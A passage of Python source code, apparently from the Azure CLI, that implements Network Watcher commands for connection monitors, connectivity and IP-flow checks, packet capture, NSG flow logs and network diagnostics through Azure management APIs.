return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
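# Note: V1 vs V2 creation is inferred from which parameter set was supplied -- the legacy
# source/dest arguments select the V1 body (and swap in an ad-hoc older API version for the
# request), while any endpoint_*/test_config_*/output arguments select the V2 body built from
# endpoints, test configurations and test groups.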
def _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name=None,
source_port=None,
location=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=60):
ConnectionMonitor, ConnectionMonitorSource, ConnectionMonitorDestination = cmd.get_models(
'ConnectionMonitor', 'ConnectionMonitorSource', 'ConnectionMonitorDestination')
cmv1 = ConnectionMonitor(
location=location,
tags=tags,
source=ConnectionMonitorSource(
resource_id=source_resource,
port=source_port
),
destination=ConnectionMonitorDestination(
resource_id=dest_resource,
port=dest_port,
address=dest_address
),
auto_start=not do_not_start,
monitoring_interval_in_seconds=monitoring_interval,
endpoints=None,
test_configurations=None,
test_groups=None,
outputs=None,
notes=None
)
return cmv1
def _create_nw_connection_monitor_v2(cmd,
location=None,
tags=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_tcp_disable_trace_route=False,
test_config_icmp_disable_trace_route=False,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
test_group_disable=False,
output_type=None,
workspace_ids=None,
notes=None):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_resource_id=endpoint_source_resource_id,
address=endpoint_source_address,
endpoint_type=endpoint_source_type,
coverage_level=endpoint_source_coverage_level)
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_resource_id=endpoint_dest_resource_id,
address=endpoint_dest_address,
endpoint_type=endpoint_dest_type,
coverage_level=endpoint_dest_coverage_level)
test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_preferred_ip_version,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https)
test_group = _create_nw_connection_monitor_v2_test_group(cmd,
test_group_name,
test_group_disable,
[test_config],
[src_endpoint],
[dst_endpoint])
if output_type:
outputs = []
if workspace_ids:
for workspace_id in workspace_ids:
output = _create_nw_connection_monitor_v2_output(cmd, output_type, workspace_id)
outputs.append(output)
else:
outputs = []
ConnectionMonitor = cmd.get_models('ConnectionMonitor')
cmv2 = ConnectionMonitor(location=location,
tags=tags,
auto_start=None,
monitoring_interval_in_seconds=None,
endpoints=[src_endpoint, dst_endpoint],
test_configurations=[test_config],
test_groups=[test_group],
outputs=outputs,
notes=notes)
return cmv2
def _create_nw_connection_monitor_v2_endpoint(cmd,
name,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
endpoint_type=None,
coverage_level=None):
if (filter_type and not filter_items) or (not filter_type and filter_items):
raise CLIError('usage error: '
'--filter-type and --filter-item for endpoint filter must be present at the same time.')
ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter')
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
return endpoint
def _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
test_frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
(ConnectionMonitorTestConfigurationProtocol,
ConnectionMonitorTestConfiguration, ConnectionMonitorSuccessThreshold) = cmd.get_models(
'ConnectionMonitorTestConfigurationProtocol',
'ConnectionMonitorTestConfiguration', 'ConnectionMonitorSuccessThreshold')
test_config = ConnectionMonitorTestConfiguration(name=name,
test_frequency_sec=test_frequency,
protocol=protocol,
preferred_ip_version=preferred_ip_version)
if threshold_failed_percent or threshold_round_trip_time:
threshold = ConnectionMonitorSuccessThreshold(checks_failed_percent=threshold_failed_percent,
round_trip_time_ms=threshold_round_trip_time)
test_config.success_threshold = threshold
if protocol == ConnectionMonitorTestConfigurationProtocol.tcp:
ConnectionMonitorTcpConfiguration = cmd.get_models('ConnectionMonitorTcpConfiguration')
tcp_config = ConnectionMonitorTcpConfiguration(
port=tcp_port,
destination_port_behavior=tcp_port_behavior,
disable_trace_route=tcp_disable_trace_route
)
test_config.tcp_configuration = tcp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.icmp:
ConnectionMonitorIcmpConfiguration = cmd.get_models('ConnectionMonitorIcmpConfiguration')
icmp_config = ConnectionMonitorIcmpConfiguration(disable_trace_route=icmp_disable_trace_route)
test_config.icmp_configuration = icmp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.http:
ConnectionMonitorHttpConfiguration = cmd.get_models('ConnectionMonitorHttpConfiguration')
http_config = ConnectionMonitorHttpConfiguration(
port=http_port,
method=http_method,
path=http_path,
request_headers=http_request_headers,
valid_status_code_ranges=http_valid_status_codes,
prefer_https=http_prefer_https)
test_config.http_configuration = http_config
else:
raise CLIError('Unsupported protocol: "{}" for test configuration'.format(protocol))
return test_config
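# Illustrative summary: the protocol argument decides which nested configuration is attached
# to the test configuration -- ConnectionMonitorTcpConfiguration for Tcp,
# ConnectionMonitorIcmpConfiguration for Icmp, ConnectionMonitorHttpConfiguration for Http --
# and any other protocol is rejected up front.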
def _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
test_configurations,
source_endpoints,
destination_endpoints):
ConnectionMonitorTestGroup = cmd.get_models('ConnectionMonitorTestGroup')
test_group = ConnectionMonitorTestGroup(name=name,
disable=disable,
test_configurations=[tc.name for tc in test_configurations],
sources=[e.name for e in source_endpoints],
destinations=[e.name for e in destination_endpoints])
return test_group
def _create_nw_connection_monitor_v2_output(cmd,
output_type,
workspace_id=None):
ConnectionMonitorOutput, OutputType = cmd.get_models('ConnectionMonitorOutput', 'OutputType')
output = ConnectionMonitorOutput(type=output_type)
if output_type == OutputType.workspace:
ConnectionMonitorWorkspaceSettings = cmd.get_models('ConnectionMonitorWorkspaceSettings')
workspace = ConnectionMonitorWorkspaceSettings(workspace_resource_id=workspace_id)
output.workspace_settings = workspace
else:
raise CLIError('Unsupported output type: "{}"'.format(output_type))
return output
def add_nw_connection_monitor_v2_endpoint(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
coverage_level=None,
endpoint_type=None,
source_test_groups=None,
dest_test_groups=None,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
address_include=None,
address_exclude=None):
(ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter,
ConnectionMonitorEndpointScope, ConnectionMonitorEndpointScopeItem) = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter',
'ConnectionMonitorEndpointScope', 'ConnectionMonitorEndpointScopeItem')
endpoint_scope = ConnectionMonitorEndpointScope(include=[], exclude=[])
for ip in address_include or []:
include_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.include.append(include_item)
for ip in address_exclude or []:
exclude_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.exclude.append(exclude_item)
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level,
scope=endpoint_scope if address_include or address_exclude else None)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.endpoints.append(endpoint)
src_test_groups, dst_test_groups = set(source_test_groups or []), set(dest_test_groups or [])
for test_group in connection_monitor.test_groups:
if test_group.name in src_test_groups:
test_group.sources.append(endpoint.name)
if test_group.name in dst_test_groups:
test_group.destinations.append(endpoint.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh endpoints
new_endpoints = [endpoint for endpoint in connection_monitor.endpoints if endpoint.name != name]
connection_monitor.endpoints = new_endpoints
# refresh test groups
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
else:
temp_test_groups = connection_monitor.test_groups
for test_group in temp_test_groups:
if name in test_group.sources:
test_group.sources.remove(name)
if name in test_group.destinations:
test_group.destinations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for endpoint in connection_monitor.endpoints:
if endpoint.name == name:
return endpoint
raise CLIError('unknown endpoint: {}'.format(name))
def list_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.endpoints
def add_nw_connection_monitor_v2_test_configuration(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
protocol,
test_groups,
frequency=None,
threshold_failed_percent=None,
threshold_round_trip_time=None,
preferred_ip_version=None,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
new_test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port,
tcp_port_behavior,
tcp_disable_trace_route,
icmp_disable_trace_route,
http_port,
http_method,
http_path,
http_valid_status_codes,
http_prefer_https,
http_request_headers)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.test_configurations.append(new_test_config)
for test_group in connection_monitor.test_groups:
if test_group.name in test_groups:
test_group.test_configurations.append(new_test_config.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh test configurations
new_test_configurations = [t for t in connection_monitor.test_configurations if t.name != name]
connection_monitor.test_configurations = new_test_configurations
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
else:
temp_test_groups = connection_monitor.test_groups
# refresh test groups
for test_group in temp_test_groups:
test_group.test_configurations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for test_config in connection_monitor.test_configurations:
if test_config.name == name:
return test_config
raise CLIError('unknown test configuration: {}'.format(name))
def list_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_configurations
def add_nw_connection_monitor_v2_test_group(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
location,
name,
endpoint_source_name,
endpoint_dest_name,
test_config_name,
disable=False,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None):
new_test_configuration_creation_requirements = [
test_config_protocol, test_config_preferred_ip_version,
test_config_threshold_failed_percent, test_config_threshold_round_trip_time,
test_config_tcp_disable_trace_route, test_config_tcp_port,
test_config_icmp_disable_trace_route,
test_config_http_port, test_config_http_method,
test_config_http_path, test_config_http_valid_status_codes, test_config_http_prefer_https
]
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_group = _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
[], [], [])
# deal with endpoint
if any([endpoint_source_address, endpoint_source_resource_id]):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address)
connection_monitor.endpoints.append(src_endpoint)
if any([endpoint_dest_address, endpoint_dest_resource_id]):
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address)
connection_monitor.endpoints.append(dst_endpoint)
new_test_group.sources.append(endpoint_source_name)
new_test_group.destinations.append(endpoint_dest_name)
# deal with test configuration
if any(new_test_configuration_creation_requirements):
        # pass the optional protocol-specific settings by keyword so they cannot shift out of
        # position against parameters such as tcp_port_behavior in the helper's signature
        test_config = _create_nw_connection_monitor_v2_test_configuration(
            cmd,
            test_config_name,
            test_config_frequency,
            test_config_protocol,
            test_config_threshold_failed_percent,
            test_config_threshold_round_trip_time,
            test_config_preferred_ip_version,
            tcp_port=test_config_tcp_port,
            tcp_disable_trace_route=test_config_tcp_disable_trace_route,
            icmp_disable_trace_route=test_config_icmp_disable_trace_route,
            http_port=test_config_http_port,
            http_method=test_config_http_method,
            http_path=test_config_http_path,
            http_valid_status_codes=test_config_http_valid_status_codes,
            http_prefer_https=test_config_http_prefer_https)
connection_monitor.test_configurations.append(test_config)
new_test_group.test_configurations.append(test_config_name)
connection_monitor.test_groups.append(new_test_group)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_groups, removed_test_group = [], None
for t in connection_monitor.test_groups:
if t.name == name:
removed_test_group = t
else:
new_test_groups.append(t)
if removed_test_group is None:
        raise CLIError('test group "{}" does not exist'.format(name))
connection_monitor.test_groups = new_test_groups
# deal with endpoints which are only referenced by this removed test group
removed_endpoints = []
for e in removed_test_group.sources + removed_test_group.destinations:
tmp = [t for t in connection_monitor.test_groups if (e in t.sources or e in t.destinations)]
if not tmp:
removed_endpoints.append(e)
connection_monitor.endpoints = [e for e in connection_monitor.endpoints if e.name not in removed_endpoints]
    # deal with test configurations which are only referenced by this removed test group
removed_test_configurations = []
for c in removed_test_group.test_configurations:
tmp = [t for t in connection_monitor.test_groups if c in t.test_configurations]
if not tmp:
removed_test_configurations.append(c)
connection_monitor.test_configurations = [c for c in connection_monitor.test_configurations
if c.name not in removed_test_configurations]
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for t in connection_monitor.test_groups:
if t.name == name:
return t
raise CLIError('unknown test group: {}'.format(name))
def list_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_groups
def add_nw_connection_monitor_v2_output(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
out_type,
workspace_id=None):
output = _create_nw_connection_monitor_v2_output(cmd, out_type, workspace_id)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
if connection_monitor.outputs is None:
connection_monitor.outputs = []
connection_monitor.outputs.append(output)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.outputs = []
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def list_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.outputs
def show_topology_watcher(cmd, client, resource_group_name, network_watcher_name, target_resource_group_name=None,
target_vnet=None, target_subnet=None): # pylint: disable=unused-argument
TopologyParameters = cmd.get_models('TopologyParameters')
return client.get_topology(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
parameters=TopologyParameters(
target_resource_group_name=target_resource_group_name,
target_virtual_network=target_vnet,
target_subnet=target_subnet
))
def check_nw_connectivity(cmd, client, watcher_rg, watcher_name, source_resource, source_port=None,
dest_resource=None, dest_port=None, dest_address=None,
resource_group_name=None, protocol=None, method=None, headers=None, valid_status_codes=None):
ConnectivitySource, ConnectivityDestination, ConnectivityParameters, ProtocolConfiguration, HTTPConfiguration = \
cmd.get_models(
'ConnectivitySource', 'ConnectivityDestination', 'ConnectivityParameters', 'ProtocolConfiguration',
'HTTPConfiguration')
params = ConnectivityParameters(
source=ConnectivitySource(resource_id=source_resource, port=source_port),
destination=ConnectivityDestination(resource_id=dest_resource, address=dest_address, port=dest_port),
protocol=protocol
)
if any([method, headers, valid_status_codes]):
params.protocol_configuration = ProtocolConfiguration(http_configuration=HTTPConfiguration(
method=method,
headers=headers,
valid_status_codes=valid_status_codes
))
return client.begin_check_connectivity(watcher_rg, watcher_name, params)
def check_nw_ip_flow(cmd, client, vm, watcher_rg, watcher_name, direction, protocol, local, remote,
resource_group_name=None, nic=None, location=None):
VerificationIPFlowParameters = cmd.get_models('VerificationIPFlowParameters')
try:
local_ip_address, local_port = local.split(':')
remote_ip_address, remote_port = remote.split(':')
    except ValueError:
        raise CLIError("usage error: '--local' and '--remote' must be in the format x.x.x.x:port")
if not is_valid_resource_id(vm):
if not resource_group_name:
raise CLIError("usage error: --vm NAME --resource-group NAME | --vm ID")
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
if not resource_group_name:
raise CLIError("usage error: --nic NAME --resource-group NAME | --nic ID")
nic = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_verify_ip_flow(
watcher_rg, watcher_name,
VerificationIPFlowParameters(
target_resource_id=vm, direction=direction, protocol=protocol, local_port=local_port,
remote_port=remote_port, local_ip_address=local_ip_address,
remote_ip_address=remote_ip_address, target_nic_resource_id=nic))
def show_nw_next_hop(cmd, client, resource_group_name, vm, watcher_rg, watcher_name,
source_ip, dest_ip, nic=None, location=None):
NextHopParameters = cmd.get_models('NextHopParameters')
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
nic = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_get_next_hop(
watcher_rg, watcher_name, NextHopParameters(target_resource_id=vm,
source_ip_address=source_ip,
destination_ip_address=dest_ip,
target_nic_resource_id=nic))
def show_nw_security_view(cmd, client, resource_group_name, vm, watcher_rg, watcher_name, location=None):
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
security_group_view_parameters = cmd.get_models('SecurityGroupViewParameters')(target_resource_id=vm)
return client.begin_get_vm_security_rules(watcher_rg, watcher_name, security_group_view_parameters)
def create_nw_packet_capture(cmd, client, resource_group_name, capture_name, vm,
watcher_rg, watcher_name, location=None,
storage_account=None, storage_path=None, file_path=None,
capture_size=None, capture_limit=None, time_limit=None, filters=None):
PacketCapture, PacketCaptureStorageLocation = cmd.get_models('PacketCapture', 'PacketCaptureStorageLocation')
storage_settings = PacketCaptureStorageLocation(storage_id=storage_account,
storage_path=storage_path, file_path=file_path)
capture_params = PacketCapture(target=vm, storage_location=storage_settings,
bytes_to_capture_per_packet=capture_size,
total_bytes_per_session=capture_limit, time_limit_in_seconds=time_limit,
filters=filters)
return client.begin_create(watcher_rg, watcher_name, capture_name, capture_params)
def set_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, nsg, storage_account=None,
resource_group_name=None, enabled=None, retention=0, log_format=None, log_version=None,
traffic_analytics_workspace=None, traffic_analytics_interval=None,
traffic_analytics_enabled=None):
from azure.cli.core.commands import LongRunningOperation
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
config = LongRunningOperation(cmd.cli_ctx)(client.begin_get_flow_log_status(watcher_rg,
watcher_name,
flowlog_status_parameters))
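    # a flow-analytics configuration without a workspace id is treated as not configured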
try:
if not config.flow_analytics_configuration.network_watcher_flow_analytics_configuration.workspace_id:
config.flow_analytics_configuration = None
except AttributeError:
config.flow_analytics_configuration = None
with cmd.update_context(config) as c:
c.set_param('enabled', enabled if enabled is not None else config.enabled)
c.set_param('storage_id', storage_account or config.storage_id)
if retention is not None:
config.retention_policy = {
'days': retention,
'enabled': int(retention) > 0
}
if cmd.supported_api_version(min_api='2018-10-01') and (log_format or log_version):
config.format = {
'type': log_format,
'version': log_version
}
if cmd.supported_api_version(min_api='2018-10-01') and \
any([traffic_analytics_workspace is not None, traffic_analytics_enabled is not None]):
workspace = None
if traffic_analytics_workspace:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not config.flow_analytics_configuration:
# must create whole object
if not workspace:
raise CLIError('usage error (analytics not already configured): --workspace NAME_OR_ID '
'[--enabled {true|false}]')
if traffic_analytics_enabled is None:
traffic_analytics_enabled = True
config.flow_analytics_configuration = {
'network_watcher_flow_analytics_configuration': {
'enabled': traffic_analytics_enabled,
'workspace_id': workspace.properties['customerId'],
'workspace_region': workspace.location,
'workspace_resource_id': traffic_analytics_workspace,
'traffic_analytics_interval': traffic_analytics_interval
}
}
else:
# pylint: disable=line-too-long
with cmd.update_context(config.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
# update object
c.set_param('enabled', traffic_analytics_enabled)
if traffic_analytics_workspace == "":
config.flow_analytics_configuration = None
elif workspace:
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', traffic_analytics_workspace)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return client.begin_set_flow_log_configuration(watcher_rg, watcher_name, config)
# resource_group_name + nsg identify the flow log via the deprecated NSG-based API (old output)
# location + flow_log_name identify the flow log via the dedicated flow-log API (new output)
def show_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, location=None, resource_group_name=None, nsg=None,
flow_log_name=None):
# deprecated approach to show flow log
if nsg is not None:
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
return client.begin_get_flow_log_status(watcher_rg, watcher_name, flowlog_status_parameters)
# new approach to show flow log
from ._client_factory import cf_flow_logs
client = cf_flow_logs(cmd.cli_ctx, None)
return client.get(watcher_rg, watcher_name, flow_log_name)
def create_nw_flow_log(cmd,
client,
location,
watcher_rg,
watcher_name,
flow_log_name,
nsg,
storage_account=None,
resource_group_name=None,
enabled=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
FlowLog = cmd.get_models('FlowLog')
flow_log = FlowLog(location=location,
target_resource_id=nsg,
storage_id=storage_account,
enabled=enabled,
tags=tags)
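    # retention, log format and traffic analytics are optional and only attached when requested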
if retention > 0:
RetentionPolicyParameters = cmd.get_models('RetentionPolicyParameters')
retention_policy = RetentionPolicyParameters(days=retention, enabled=(retention > 0))
flow_log.retention_policy = retention_policy
if log_format is not None or log_version is not None:
FlowLogFormatParameters = cmd.get_models('FlowLogFormatParameters')
format_config = FlowLogFormatParameters(type=log_format, version=log_version)
flow_log.format = format_config
if traffic_analytics_workspace is not None:
TrafficAnalyticsProperties, TrafficAnalyticsConfigurationProperties = \
cmd.get_models('TrafficAnalyticsProperties', 'TrafficAnalyticsConfigurationProperties')
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
traffic_analytics_config = TrafficAnalyticsConfigurationProperties(
enabled=traffic_analytics_enabled,
workspace_id=workspace.properties['customerId'],
workspace_region=workspace.location,
workspace_resource_id=workspace.id,
traffic_analytics_interval=traffic_analytics_interval
)
traffic_analytics = TrafficAnalyticsProperties(
network_watcher_flow_analytics_configuration=traffic_analytics_config
)
flow_log.flow_analytics_configuration = traffic_analytics
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, flow_log)
def update_nw_flow_log_getter(client, watcher_rg, watcher_name, flow_log_name):
return client.get(watcher_rg, watcher_name, flow_log_name)
def update_nw_flow_log_setter(client, watcher_rg, watcher_name, flow_log_name, parameters):
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, parameters)
def update_nw_flow_log(cmd,
instance,
location,
resource_group_name=None, # dummy parameter to let it appear in command
enabled=None,
nsg=None,
storage_account=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
with cmd.update_context(instance) as c:
c.set_param('enabled', enabled)
c.set_param('tags', tags)
c.set_param('storage_id', storage_account)
c.set_param('target_resource_id', nsg)
with cmd.update_context(instance.retention_policy) as c:
c.set_param('days', retention)
c.set_param('enabled', retention > 0)
with cmd.update_context(instance.format) as c:
c.set_param('type', log_format)
c.set_param('version', log_version)
if traffic_analytics_workspace is not None:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
if instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration is None:
analytics_conf = cmd.get_models('TrafficAnalyticsConfigurationProperties')
instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration = analytics_conf()
with cmd.update_context(
instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
c.set_param('enabled', traffic_analytics_enabled)
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', workspace.id)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return instance
def list_nw_flow_log(client, watcher_rg, watcher_name, location):
return client.list(watcher_rg, watcher_name)
def delete_nw_flow_log(client, watcher_rg, watcher_name, location, flow_log_name):
return client.begin_delete(watcher_rg, watcher_name, flow_log_name)
def start_nw_troubleshooting(cmd, client, watcher_name, watcher_rg, resource, storage_account,
storage_path, resource_type=None, resource_group_name=None,
no_wait=False):
TroubleshootingParameters = cmd.get_models('TroubleshootingParameters')
params = TroubleshootingParameters(target_resource_id=resource, storage_id=storage_account,
storage_path=storage_path)
return sdk_no_wait(no_wait, client.begin_get_troubleshooting, watcher_rg, watcher_name, params)
def show_nw_troubleshooting_result(cmd, client, watcher_name, watcher_rg, resource, resource_type=None,
resource_group_name=None):
query_troubleshooting_parameters = cmd.get_models('QueryTroubleshootingParameters')(target_resource_id=resource)
return client.begin_get_troubleshooting_result(watcher_rg, watcher_name, query_troubleshooting_parameters)
def run_network_configuration_diagnostic(cmd, client, watcher_rg, watcher_name, resource,
direction=None, protocol=None, source=None, destination=None,
destination_port=None, queries=None,
resource_group_name=None, resource_type=None, parent=None):
NetworkConfigurationDiagnosticParameters, NetworkConfigurationDiagnosticProfile = \
cmd.get_models('NetworkConfigurationDiagnosticParameters', 'NetworkConfigurationDiagnosticProfile')
if not queries:
queries = [NetworkConfigurationDiagnosticProfile(
direction=direction,
protocol=protocol,
source=source,
destination=destination,
destination_port=destination_port
)]
params = NetworkConfigurationDiagnosticParameters(target_resource_id=resource, profiles=queries)
return client.begin_get_network_configuration_diagnostic(watcher_rg, watcher_name, params)
# endregion
# region CustomIpPrefix
def create_custom_ip_prefix(cmd, client, resource_group_name, custom_ip_prefix_name, location=None,
